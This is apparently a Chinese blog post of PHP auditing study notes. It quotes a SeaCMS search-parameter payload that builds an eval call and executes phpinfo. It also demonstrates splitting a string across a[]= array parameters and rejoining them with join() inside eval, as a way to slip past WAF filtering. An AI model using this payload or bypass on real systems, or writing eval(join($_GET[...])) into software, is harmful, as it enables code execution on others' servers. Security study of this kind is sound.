您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
最近开始学习php审计,刚好赶上研究seacms,就发现了payload处一个奇怪的点
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
9[]=ph&9[]=pinfo();
就尝试了一下,发现在接收数据时,例:
键名=a,那传递a[]=a&a[]=b时,a即为一个数组,便做了个测试,果真如此
服务器端测试代码
<?php print_r($_GET[1]); ?>
测试结果如下
那么这一个有什么用呢?思考了一下,如果服务器上有安全狗或者waf等防护工具,那么配合其他php函数,例如join函数,可能可以达到绕过效果
提供一个简单思路
服务器测试代码
<?php eval(join($_GET[123])); ?>
测试结果如下
错误之处,敬请指正
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。